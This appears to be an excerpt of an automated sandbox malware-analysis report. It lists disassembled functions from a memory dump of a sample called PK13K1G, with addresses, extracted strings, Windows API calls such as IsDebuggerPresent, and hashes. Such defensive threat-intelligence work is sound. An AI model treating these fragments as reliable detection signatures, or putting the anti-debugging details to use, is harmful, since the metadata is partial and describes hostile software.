Function 00416F3C Relevance: 12.0, Strings: 9, Instructions: 726COMMON

Download Yara Rule

Strings

eo9, xrefs: 004170ED
N3u5, xrefs: 00417185
JKL, xrefs: 00417414
I'F), xrefs: 00417162
yr, xrefs: 00416F74
V;U=, xrefs: 0041714A
*~p, xrefs: 004173FC
]?A!, xrefs: 00417152
V+,-, xrefs: 0041716A

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: *~p$I'F)$N3u5$V+,-$V;U=$]?A!$eo9$yr$JKL
API String ID: 0-14227417
Opcode ID: 20dea588be6368a56f5e1797a629e701cd1b8790c21a162319a44a8886d8f9a7
Instruction ID: 2489f9e57884414e0092521a529d48037da61f289c581a2dd4c4978005370de8
Opcode Fuzzy Hash: 20dea588be6368a56f5e1797a629e701cd1b8790c21a162319a44a8886d8f9a7
Instruction Fuzzy Hash: B73259725083118BC324CF28C8916ABB7F1FFD9354F198A6EE8C997361E7389941C75A

Function 00423610 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 445COMMON

Download Yara Rule

Strings

3\E=, xrefs: 00423A89
{x, xrefs: 00423AF8
J+a-, xrefs: 004237FB
'\E=, xrefs: 00423A2A
vw, xrefs: 004239B7

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: '\E=$3\E=$J+a-$vw${x
API String ID: 0-857652768
Opcode ID: 3c639d5c8ad44bccb64ebba85bb1f8b0c824cc5e3e2113a3f27bffa47fbcca0a
Instruction ID: bbac44fac4e618ce8925d8590b277241c6f400b47e050aef12b0bee7e4c40c5e
Opcode Fuzzy Hash: 3c639d5c8ad44bccb64ebba85bb1f8b0c824cc5e3e2113a3f27bffa47fbcca0a
Instruction Fuzzy Hash: 9AD1D9B46183009FD310DF64E89162BBBF1EF86705F44892DF9968B351E7789A06CB4B

Function 0040D926 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 312COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040D93B

Strings

!(=<, xrefs: 0040D9F8
04:, xrefs: 0040DA24
"0$, xrefs: 0040DA0E
KM, xrefs: 0040DBA7

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: Uninitialize
String ID: !(=<$"0$$04:$KM
API String ID: 3861434553-1478049192
Opcode ID: 99b4e34b5d3934d4bbeb2b91ea297b44f8fcd5b252ba6f80a835798dec3e8a22
Instruction ID: 2ddd886839952a95c22459b75535bafaf1920cdac4ed35ce2ac9b623ab95b9d0
Opcode Fuzzy Hash: 99b4e34b5d3934d4bbeb2b91ea297b44f8fcd5b252ba6f80a835798dec3e8a22
Instruction Fuzzy Hash: 06A1EFB550C3D08AD7358F2588907EBBFE1ABDB304F185A6DC0C96B282C738450ACB5B

Function 00025027 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00025033
IsDebuggerPresent.KERNEL32 ref: 000250FF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00025118
UnhandledExceptionFilter.KERNEL32(?), ref: 00025122

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e86fa9a18437dca611be30d93449124a4fe5ee057a768f3ab4f72fb4896e3c9e
Instruction ID: 4f89863ea37a03d0e3daf2637928e28bb8b038c042d04bda1da33d62c2308cd8
Opcode Fuzzy Hash: e86fa9a18437dca611be30d93449124a4fe5ee057a768f3ab4f72fb4896e3c9e
Instruction Fuzzy Hash: 7831E375D012299ADB61DFA4E9897CDBBB8AF08300F1041EAE50DAB250EB759B848F45

Function 00424D27 Relevance: 5.4, Strings: 4, Instructions: 412COMMON

Download Yara Rule

Strings

>N<@, xrefs: 00424EA0
6B<D, xrefs: 00424EA7
7F#X, xrefs: 00424EAE
YZ7F#X6B<D>N<@, xrefs: 0042507C, 0042508A, 004250E7, 00424FA5

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: 6B<D$7F#X$>N<@$YZ7F#X6B<D>N<@
API String ID: 0-1293874883
Opcode ID: 8aaef895f7e404f1371eca5e739aab32b54c9a5c4416b90c0a77ea39e927db0f
Instruction ID: bb1d4566940c94898ce1c50c506b95641d6ae6a16f526c6e38df1822cb26210a
Opcode Fuzzy Hash: 8aaef895f7e404f1371eca5e739aab32b54c9a5c4416b90c0a77ea39e927db0f
Instruction Fuzzy Hash: ADE1D276E00226CBCB18CF68D8905FEB3B2FF99710F668169D442A7354DB34AD52CB94

Function 00431862 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004318A4
GetSystemMetrics.USER32 ref: 004318B3

Strings

, xrefs: 0043195E

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 409654093caab4803c18f46568e8ff0a3ec4364fa59cea00d26cb551dd387e59
Instruction ID: 5e188c53d07f53991947317c89a2ac73dcdf0177b59a0b13772854715ea448ce
Opcode Fuzzy Hash: 409654093caab4803c18f46568e8ff0a3ec4364fa59cea00d26cb551dd387e59
Instruction Fuzzy Hash: 49317EB09143009FDB40EF68E989A5ABBF4BB88304F51853DE489DB360D774AD48CB86

Function 0041918D Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

rGy, xrefs: 004192D8
rGy, xrefs: 00419228
nGy, xrefs: 004191EC
nGy, xrefs: 004192A8

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: nGy$nGy$rGy$rGy
API String ID: 0-3537647449
Opcode ID: 5866ea97e157d1b378d8a6066ddaec5bb404846da82fb6b08b6ecbe370ee70c6
Instruction ID: 17f9d3a57f5a0c21b8a60208983c86ab3c74709919fbc0444c9181eb752b21f1
Opcode Fuzzy Hash: 5866ea97e157d1b378d8a6066ddaec5bb404846da82fb6b08b6ecbe370ee70c6
Instruction Fuzzy Hash: 2E414B759083149BD714CF24D8606AFB6E2EBDA300F298A3DE8C593365DA35DC80C78D

Function 00415420 Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

nGy, xrefs: 0041542F
rGy, xrefs: 00415468
nGy, xrefs: 0041521F
rGy, xrefs: 00415258

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID: nGy$nGy$rGy$rGy
API String ID: 2994545307-3537647449
Opcode ID: 02a2dd4b84115b38c99ac410873a76f4793e008ff53537b5c3060897a9f3c11d
Instruction ID: 4ba4b7840c35a485763ecacd95ab9beea59b01d16c031b55da6bafce16abd554
Opcode Fuzzy Hash: 02a2dd4b84115b38c99ac410873a76f4793e008ff53537b5c3060897a9f3c11d
Instruction Fuzzy Hash: 93314536A48320CBC334CA54C8D0AFFB6A7EBD9701F69C66DC88557725CA384C808BD9

Function 0042861A Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

Xstu, xrefs: 004287D5, 00428816
hi, xrefs: 004286DE
Xstu, xrefs: 00428850

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: Xstu$Xstu$hi
API String ID: 0-1979255242
Opcode ID: 6a46da1aca4a5fbc5328967f8ee3e29a3ab8d245139b22a2b6e8a0a0a1732b1a
Instruction ID: 632f42ee938fc9b27308cb68885590fc6844e938153ef0d4203eb6e9b71ee1df
Opcode Fuzzy Hash: 6a46da1aca4a5fbc5328967f8ee3e29a3ab8d245139b22a2b6e8a0a0a1732b1a
Instruction Fuzzy Hash: 22C1F2B5608311CBC714DF24D85266BB3F1FF96314F58492DE5829B391EB389604CB5A

Function 00428538 Relevance: 4.1, Strings: 3, Instructions: 391COMMON

Download Yara Rule

Strings

Xstu, xrefs: 004287D5, 00428816
hi, xrefs: 004286DE
Xstu, xrefs: 00428850

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: Xstu$Xstu$hi
API String ID: 0-1979255242
Opcode ID: d35e94e52bedccea74c7e66fc02761985f066248baed41a42bec55f2dbfc729a
Instruction ID: 5e52be45b1ce7585468b6be40595dee7e04e28c3eb4828c679dd396474a60fb8
Opcode Fuzzy Hash: d35e94e52bedccea74c7e66fc02761985f066248baed41a42bec55f2dbfc729a
Instruction Fuzzy Hash: 15C1F1B5608311CBC714DF24D85266BB3F1FF92318F58892DE5869B391EB38DA04CB5A

Function 00409710 Relevance: 4.1, Strings: 3, Instructions: 367COMMON

Download Yara Rule

Strings

R,UY, xrefs: 004097A0
~pv~, xrefs: 00409830
C, xrefs: 004098BC

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: C$R,UY$~pv~
API String ID: 0-4009908254
Opcode ID: 64910c6f0e21f7ed477d208e68ae105aefedebcc6be466c579a7aa8c671eeef7
Instruction ID: 60df252e01a7cb37ee0fc8ba26e3e05ea271b3237d82d8219249cc7167a296ab
Opcode Fuzzy Hash: 64910c6f0e21f7ed477d208e68ae105aefedebcc6be466c579a7aa8c671eeef7
Instruction Fuzzy Hash: CCB1057190C3408BD728DF35C85166BBBE1EBD2308F14896DE4D59B382D639C90ACB5A

Function 004229DD Relevance: 4.0, Strings: 3, Instructions: 224COMMON

Download Yara Rule

Strings

@Gqq, xrefs: 00422AFF
ggUW, xrefs: 00422ABF
422:, xrefs: 00422A8F

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: 422:$@Gqq$ggUW
API String ID: 0-3938830640
Opcode ID: 23b5e7c27c28ccd7bd8d99bb2b6ab6b8f4d340e9d5b4cd0f80fce2df156ae513
Instruction ID: 129504c3bc2de16bf1c3c165f6c3dffaca77ef3fe00077117efd14370fec344c
Opcode Fuzzy Hash: 23b5e7c27c28ccd7bd8d99bb2b6ab6b8f4d340e9d5b4cd0f80fce2df156ae513
Instruction Fuzzy Hash: 6B61F5B47183409FD7188F25AD51A3FBBE1FBD6310FA4992EF49287394DB789801874A

Function 004156A5 Relevance: 3.9, Strings: 3, Instructions: 125COMMON

Download Yara Rule

Strings

gfff, xrefs: 004156AB
nGy, xrefs: 00415772
rGy, xrefs: 004157A8

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: gfff$nGy$rGy
API String ID: 0-3533343134
Opcode ID: 20bbd9a8487e31bc09eac82e633fd422a8b2260971aebac3fe5c6e9b26dffbbd
Instruction ID: d638ec93511618fff6d2b0b2080874d1b96812ff889f9e89d181f28f7ffe0fdf
Opcode Fuzzy Hash: 20bbd9a8487e31bc09eac82e633fd422a8b2260971aebac3fe5c6e9b26dffbbd
Instruction Fuzzy Hash: D1312576A40206CBC71CCF29CC527AAB6D6B7C6304F59C23ED052CB3A5E73899018B85

Function 00413FF0 Relevance: 3.7, Strings: 2, Instructions: 1165COMMON

Download Yara Rule

Strings

1LA, xrefs: 0041478C
bGA, xrefs: 0041475A

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: 1LA$bGA
API String ID: 0-1418806677
Opcode ID: 122592c219bacad2dd8546872dfbf6b33c3cefc49f46e77a24b5e6d63e24688c
Instruction ID: bab1ff0da25d5e32472770d9f8fcd5f8c8313c4ccc16ca6414e8a5ee659d0e82
Opcode Fuzzy Hash: 122592c219bacad2dd8546872dfbf6b33c3cefc49f46e77a24b5e6d63e24688c
Instruction Fuzzy Hash: 836256B66083009BD714CF14EC91BAB73E1EBC9314F19852DE98697391EB78E841C79A

Function 0043D9C0 Relevance: 2.9, Strings: 2, Instructions: 363COMMON

Download Yara Rule

Strings

=012, xrefs: 0043DA90
, xrefs: 0043DA74, 0043DB61

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID: =012$
API String ID: 2994545307-2545393538
Opcode ID: aa336797c0ec694a203b98cf09ff135a0571c4e7a9ca72816275432701e9a351
Instruction ID: 0d8b2b17bd2b6ef550571fceb2dc5793d891563aa027ef7e1c515e68f6f40251
Opcode Fuzzy Hash: aa336797c0ec694a203b98cf09ff135a0571c4e7a9ca72816275432701e9a351
Instruction Fuzzy Hash: 49917772F083104FD7189E24E891A3BB7A2EBDA304F19D53DE59287391CA79EC06C785

Function 0041CB30 Relevance: 2.7, Strings: 2, Instructions: 198COMMON

Download Yara Rule

Strings

C$E, xrefs: 0041CBC7
d89:, xrefs: 0041CCE9

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: d89:$C$E
API String ID: 0-1121744348
Opcode ID: 47e972f65571cdfc68cdcbf982803ce7171958eaad04b02010db2815dc749fee
Instruction ID: c9b2353c6fa648aa12ead3f1bdc48f3da6e51e6a9dac354d13a9935bd0098052
Opcode Fuzzy Hash: 47e972f65571cdfc68cdcbf982803ce7171958eaad04b02010db2815dc749fee
Instruction Fuzzy Hash: 9E51E1B46483008BD7149F28C8927ABB7F0EF92714F04886DF9C99B391E339D905C75A

Function 00438FB0 Relevance: 2.0, Strings: 1, Instructions: 725COMMON

Download Yara Rule

Strings

f, xrefs: 00439245

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 980c87f6a3edebdf8d0e89f0985b3c6eac75d0646c4faec1f484f273d0b7e4d8
Instruction ID: a94163a964c3260c66a7571a53013e02456f615da0f7ce3a3fa3dba8415186ff
Opcode Fuzzy Hash: 980c87f6a3edebdf8d0e89f0985b3c6eac75d0646c4faec1f484f273d0b7e4d8
Instruction Fuzzy Hash: 882213716083518FD724CF28C880A2FB7E2EBD9314F19962EE8D597391D6B9DC01CB96

Function 00436CD8 Relevance: 1.7, Strings: 1, Instructions: 468COMMON

Download Yara Rule

Strings

QR, xrefs: 00436F62

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: QR
API String ID: 0-1729908274
Opcode ID: 3ee5d065e8164935e3669a85ef3ab9d286659e4f81fa916a7a752105b8f5da40
Instruction ID: 82e63b16a5052f753b0a19232a6235744aa799696cabc260d9849e14f287f769
Opcode Fuzzy Hash: 3ee5d065e8164935e3669a85ef3ab9d286659e4f81fa916a7a752105b8f5da40
Instruction Fuzzy Hash: 0EE1F87F629611CBCB1C9F64DCA126A73B2FF8A741F0AC47EC5424B2A1DB788950CB45

Function 00422270 Relevance: 1.7, Strings: 1, Instructions: 457COMMON

Download Yara Rule

Strings

!, xrefs: 004222E4

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-113910852
Opcode ID: eece2a582efa1dc86ec89c9f98118bf842124dd7918020327bc817f4d9fe238e
Instruction ID: 06822693060e8c7f3a637b27e34f0bfc19770614e46dd0fbacf700ab91f8a53d
Opcode Fuzzy Hash: eece2a582efa1dc86ec89c9f98118bf842124dd7918020327bc817f4d9fe238e
Instruction Fuzzy Hash: 74D17932A04321ABD724CF24D85166BB3F1EF94314F48C92EE8C5A7341E7B8ED45879A

Function 0042AE26 Relevance: 1.6, Strings: 1, Instructions: 336COMMON

Download Yara Rule

Strings

E:0/, xrefs: 0042AE46

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: E:0/
API String ID: 0-3504676095
Opcode ID: 39026aaf4aef40779100b3a85c9e922c04e14c1559934c4c3f07da1f6652a999
Instruction ID: 9ac02c6689684af9e78cccd01bcb75a9e0fb095f72e9de746f916af92c559b81
Opcode Fuzzy Hash: 39026aaf4aef40779100b3a85c9e922c04e14c1559934c4c3f07da1f6652a999
Instruction Fuzzy Hash: 4CA1F3746043528FD319CF29D4A0722FBE1AFA7304F2995AED4DA9B392C739D806CB54

Function 0042AB32 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

26dF, xrefs: 0042CE06

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: 26dF
API String ID: 0-3316530194
Opcode ID: ae67d3c5fdc14f4e5c65252d44acd77d002c9f3b4850b7a52dba7178e43d5b74
Instruction ID: 8d4f82196a49da55c0665ad50183b051829108aecefe2fef1455a0bcaeb2f9d5
Opcode Fuzzy Hash: ae67d3c5fdc14f4e5c65252d44acd77d002c9f3b4850b7a52dba7178e43d5b74
Instruction Fuzzy Hash: 80A147702047918BE3298F39D4D1326FFA2AF96314F28C6AEC4E68F796C67D9406C754

Function 0042AB7E Relevance: 1.5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

Strings

26dF, xrefs: 0042CE06

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: 26dF
API String ID: 0-3316530194
Opcode ID: 25282b35838178611431dee398a47e060af5700169a55f64c2188885e8b4b4d4
Instruction ID: 648b8d81d1715bf33c27b38da97c9cc143a65f362fa2c81590d1c9528e06aa6b
Opcode Fuzzy Hash: 25282b35838178611431dee398a47e060af5700169a55f64c2188885e8b4b4d4
Instruction Fuzzy Hash: C28145706087918BD7298F29D490326FFA2AFA3314F68869EC0D64F796C77D9406C768

Function 0042B260 Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

26dF, xrefs: 0042CE06

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: 26dF
API String ID: 0-3316530194
Opcode ID: 76d21e0bdfa7bb194b7da6abe8b21483de58d536ee1d4351fe30089fa52f9dc1
Instruction ID: c060cf0ac470d7b4d1470119975102ddc4cac72ea04d04372b102c3f65e91609
Opcode Fuzzy Hash: 76d21e0bdfa7bb194b7da6abe8b21483de58d536ee1d4351fe30089fa52f9dc1
Instruction Fuzzy Hash: B78136706087918BD7298F29D4D1326FFA2AFA3314F28869DC0D64F796C77D9406CB68

Function 00422CA2 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

B.B, xrefs: 00422E30

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: B.B
API String ID: 0-529180972
Opcode ID: f7bb2f3e579703d4dfc37a0831be1bcff65f5d000ff138c27207d782f7718801
Instruction ID: 03af2ce532729a7530b1bf4351375922cc528762421252d929bc5b81e240c89e
Opcode Fuzzy Hash: f7bb2f3e579703d4dfc37a0831be1bcff65f5d000ff138c27207d782f7718801
Instruction Fuzzy Hash: ED610335B19212DFE308CF28DC4162AB3E6FB8A712F59867CE84597254C779EE11CB84

Function 0042B327 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

YTYU, xrefs: 0042BBD8

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: YTYU
API String ID: 0-2358008382
Opcode ID: 14b2fd72a49705a6d3eedb90bd1335b39f3c6885b9eabfd9e3c15759518a0207
Instruction ID: 0650dd34ebc6498645533b5ef8a90141fcfc8dc4f32f48763eac1050fe328a42
Opcode Fuzzy Hash: 14b2fd72a49705a6d3eedb90bd1335b39f3c6885b9eabfd9e3c15759518a0207
Instruction Fuzzy Hash: 0B5104346042918BE715CF3AD450372FBA2EFA7314B68959DC4C29B747C739A807CBA4

Function 0043C920 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@, xrefs: 0043C9E4

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 9d8d225b06606aa92007faca9687fc00818c38415173826f354c95d51d6fb2f3
Instruction ID: 3ba0de2baa4ca7597e381011d04a0f47eb79544f92b61cf4d9c8566e1c9a9110
Opcode Fuzzy Hash: 9d8d225b06606aa92007faca9687fc00818c38415173826f354c95d51d6fb2f3
Instruction Fuzzy Hash: DB4119B6A043018BD704CF25CC91767B7E2FFD9324F1A922ED49557394DB38D905878A

Function 0043CF00 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

@, xrefs: 0043CF6D

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 7595b0d5f817b1ac764af4e00e2e520981d4e830ea027670a9e6dea09e1e6f64
Instruction ID: aa811cd8779156100f7104f1871f0fb946c4193bae6b18832b13c76b7208ecbd
Opcode Fuzzy Hash: 7595b0d5f817b1ac764af4e00e2e520981d4e830ea027670a9e6dea09e1e6f64
Instruction Fuzzy Hash: B93156766083004BC304CF68D8D166FBBF6FBDA354F15983DE58483390DB3999088B5A

Function 0042BBCC Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

YTYU, xrefs: 0042BBD8

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: YTYU
API String ID: 0-2358008382
Opcode ID: 73eeaca80536650663b39a5eaddda922878eac8594ecebba61173a70e03f394e
Instruction ID: 918a240a1d69b6baa6222a1a3c90f52b3dc026c57330827e8e800b5fd842b172
Opcode Fuzzy Hash: 73eeaca80536650663b39a5eaddda922878eac8594ecebba61173a70e03f394e
Instruction Fuzzy Hash: FD31C7746042918AEB158F3AD060372FBA1EFA7314F68959EC5D69B393C7398843CB94

Function 0042855A Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

"SV, xrefs: 00428579

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: "SV
API String ID: 0-3608588746
Opcode ID: d3cce503716c3160db01c0693833db59c3f5ea3a596733831b09c9a5d1464c13
Instruction ID: ffd121c1796a673a837665ebb160d24251c8a5012fb86fa17f8eaeab2075f1ec
Opcode Fuzzy Hash: d3cce503716c3160db01c0693833db59c3f5ea3a596733831b09c9a5d1464c13
Instruction Fuzzy Hash: F511E4326197248FC7049F649C0252FB2F2FB96704FAD983ED48197301EA38EC509BCA

Function 0041B0A1 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

/, xrefs: 0041B0CE

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2615204595
Opcode ID: c0782de49028139c6016e11858f8e55c63ac26a719416d6a17ff07e9cbeb19e9
Instruction ID: 8ecc43d0f0731c9d53655e955dc60154cb530fc39d62083883702670f65f8d56
Opcode Fuzzy Hash: c0782de49028139c6016e11858f8e55c63ac26a719416d6a17ff07e9cbeb19e9
Instruction Fuzzy Hash: BC11AC7420D3819BC354CF29C5F16ABBBE1DF86354FA9A95CE4D587311E374C8818B8A

Function 00407410 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8148c8f96bc10c85be6c8421eb93e5b0be2ea4cbb7d72c6d226cca57b1062b1a
Instruction ID: 0ffdd326a6e513791af2d30e7f13c65885a696ebe50d2579634c135d2452baba
Opcode Fuzzy Hash: 8148c8f96bc10c85be6c8421eb93e5b0be2ea4cbb7d72c6d226cca57b1062b1a
Instruction Fuzzy Hash: 55129531A0C7118BD724DF18D8816ABB3E1AFC4319F29893ED986A7281D738B955CB47

Function 0043BE60 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
